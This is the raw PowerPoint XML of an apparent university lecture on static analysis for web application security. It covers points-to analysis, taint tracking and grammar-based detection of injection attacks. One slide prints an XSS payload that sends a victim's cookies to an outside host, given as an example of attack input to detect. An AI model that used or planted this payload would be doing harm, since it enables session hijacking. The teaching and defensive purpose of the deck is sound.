            <a:ext cx="833437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Modify Input, Use a New Grammar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Define an augmented grammar with additional production rules using new delimiters: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Add the delimiters around all user input.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Make sure commands parse correctly with the new grammar before stripping delimiters and running the real command.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6713EB05-BE4C-4D69-8CA3-3B9D43B0FE6A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28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590800"/>
            <a:ext cx="24288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Applicable Beyond SQL Injection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The idea is “general and appl[ies] to other settings that generate structured, meaningful output from user-provided input.”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Cross-Site Scripting (XSS)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XPath injection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Shell injection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07620EEF-DB57-4307-9A57-BB0D7B6019C5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29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Unchecked User Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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1143000" y="1600200"/>
          <a:ext cx="6859588" cy="2627779"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4040188"/>
                <a:gridCol w="2819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Sources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Vulnerabilities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Parameter manipulation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SQL Injection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URL manipulation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HTTP response splitting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Header manipulation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Cross-site scripting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Cookie poisoning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Path traversal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Command injection</a:t>
                      </a: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10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90600" y="4267200"/>
            <a:ext cx="6934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>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>When input is not properly sanitized before use, a variety of vulnerabilities are possible.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E6762788-595C-47C5-99D4-A278313A72BC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3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Cross Site Scripting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The following attack input could be detected:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone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&gt;&lt;script&gt;document.location='http://www.xss.com/cgi-bin/cookie.cgi?'%20+document.cookie&lt;/script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It is “…not a valid syntactic form, since the first character completes a preceding tag.”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What grammar does one augment?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XSS can be within HTML or JavaScript.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Can this input be XSS and what syntax would it violate?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="ctr">
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone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javascript:document.location=...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34B7A7B3-76E9-40F2-8306-ADCA89E26E8E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30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Evaluation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CFAA148C-D40D-46D6-9F7C-59A58A6F96CC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31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571625"/>
            <a:ext cx="81915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According to the Authors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PQL trusts user filters, so it does not provide strong security guarantees.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SQLCheck (their system) does not address completeness.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They intend to look at static analysis to instrument code without requiring it all to be done </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>manually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>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D3F26CDA-D359-4BDD-A7ED-2CC0C09CB228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32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Summary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Livshits and Lam, ‘05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Improve existing points-to analysis.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Use PQL for taint specification and analysis.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Combine into a working Eclipse plugin.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Found previously unknown vulnerabilities in real applications.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Su and Wasserman, ‘06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Formal definition of command injection attacks.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Write a grammar for structured output and see if the user input changes the structure.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Manually modify all places where input enters code and where commands are executed.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Prevented known SQL injection vulnerabilities in their own tests.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2241A272-AB4A-4FF4-A6E5-EA5D55C45ED3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33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References and Related Work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“Points-to Analysis using BDDs.” Marc Berndl, Ondrej Lhotak, Feng Qian, Laurie Hendren and Navindra Umane. PLDI 2003.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“Pointer Analysis: Haven’t We Solved This Problem Yet.” Michael Hind. PASTE 2001.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“Finding Security Vulnerabilities in Java Applications with Static Analysis.” V. Benjamin Livshits and Monica S. Lam. Usenix Security 2005.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“Resolving and Exploiting the k-CFA Paradox: Illuminating Functional vs. Object-Oriented Program Analysis.” Matthew Might, Yannis Smaragdakis, and David Van Horn. PLDI 2010.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“The Essence of Command Injection Attacks in Web Applications.” Zhendong Su and Gary Wassermann. POPL 2006.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“Cloning-Based Context-Sensitive Pointer Alias Analysis Using Binary Decision Diagrams.” John Whaley and Monica S. Lam. PLDI 2004.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DE77C370-1673-4A21-91EF-E78E45B5E2D2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34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Detecting Unchecked Input Statically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9725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Goal: use static analysis to identify missing input sanitization.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We’ll call use of unchecked input “security violations.”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Can we use existing points-to analysis?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Sound, precise, and scalable?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Is points-to analysis all we need?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BE3335AD-EA9C-49AF-80F1-412D7ABD57CA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4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Background: Points-to Analysis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Determine which heap objects a given program variable may point to during execution.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Desirable qualities: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Soundness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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No false negatives: every possible points-to relationship is identified. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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Being conservative leads to imprecision.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Precision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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Few false positives.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Efficiency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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Speed of analysis can be a problem.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7DFE264A-0E56-4863-9FF8-3F55A1F5D24B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5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Points-to Precision Problem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533400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en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>An imprecise points-to analysis would not differentiate between possible objects referred to by s1 and s2.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05000" y="1350963"/>
            <a:ext cx="5943600" cy="37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class DataSource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    String url;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    DataSource(String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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this.url = url;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    String getUrl(){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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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this.url;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9     ...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String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passedUrl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request.getParameter("...");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DataSource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ds1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DataSource(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passedUrl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String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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localUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="140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"http://localhost/";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DataSource </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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ds2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DataSource(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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localUrl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String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ds1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.getUrl();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String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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ds2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.getUrl();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35160224-AAFD-4057-B766-0B95E579F32B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6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Imprecision From Context-Insensitivity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5791200"/>
            <a:ext cx="8229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</a:rPr>
              <a:t>pointsto( v : Var,  h : Heap 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4988294B-D018-4B96-A4B3-5A4AFEFE108F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7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3581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Object id( Object p ) {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return p;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 = id( a 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y = id( b );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181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7086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172200" y="29718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p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5181600" y="42672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x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086600" y="42672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y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9228" name="AutoShape 12"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="9223" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2362200"/>
            <a:ext cx="685800" cy="649288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29" name="AutoShape 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="9224" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6781800" y="2362200"/>
            <a:ext cx="609600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0" name="AutoShape 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="9226" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5486400" y="3581400"/>
            <a:ext cx="685800" cy="6858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1" name="AutoShape 15"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3581400"/>
            <a:ext cx="612775" cy="6858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Context-Sensitive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5791200"/>
            <a:ext cx="8229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</a:rPr>
              <a:t>pointsto( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>vc : VarContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>,  v : Var,  h : Heap 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B5B120C9-54C7-4EDC-ADB9-F2609B618CA7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8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3581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Object id( Object p ) {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return p;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ClrTx/>
              <a:buFontTx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 = id( a );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClrTx/>
              <a:buFontTx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y = id( b );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181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7086600" y="17526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086600" y="29718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p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" baseline="-2500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181600" y="42672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x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7086600" y="42672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y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10252" name="AutoShape 12"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="10247" idx="2"/>
            <a:endCxn id="10256" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2362200"/>
            <a:ext cx="1588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3" name="AutoShape 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="10248" idx="2"/>
            <a:endCxn id="10249" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="2362200"/>
            <a:ext cx="1588" cy="6096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4" name="AutoShape 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="10256" idx="2"/>
            <a:endCxn id="10250" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="3581400"/>
            <a:ext cx="1588" cy="6858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5" name="AutoShape 15"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="10249" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="3581400"/>
            <a:ext cx="3175" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38160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5181600" y="2971800"/>
            <a:ext cx="609600" cy="609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p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" baseline="-2500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Context-sensitivity and Cloning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The context of a method invocation is distinguished by its call path (call stack).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i="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-CFA (Control Flow Analysis): remember only the last </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> call sites.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Use cloning. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[Whaley, PLDI 04]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Generate multiple instances of a method so that each call is invoking a different instance.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 i="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>∞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-CFA when there is no recursion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Does cloning sound familiar? KLEE?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  <a:p>
            <a:pPr lvl="1"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2010-05-03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  <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Static Analysis and Web App Security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fld id="{18807E36-79D0-41F9-8932-862D0B2DB989}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr 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8249</TotalTime>
  <Words>1897</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>442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Times New Roman</vt:lpstr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</dc:title>
  <dc:creator>Windows User</dc:creator>
  <cp:lastModifiedBy>Ben Livshits</cp:lastModifiedBy>
  <cp:revision>280</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-27T20:48:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-05-03T20:39:41Z</dcterms:modified>
</cp:coreProperties>
</file>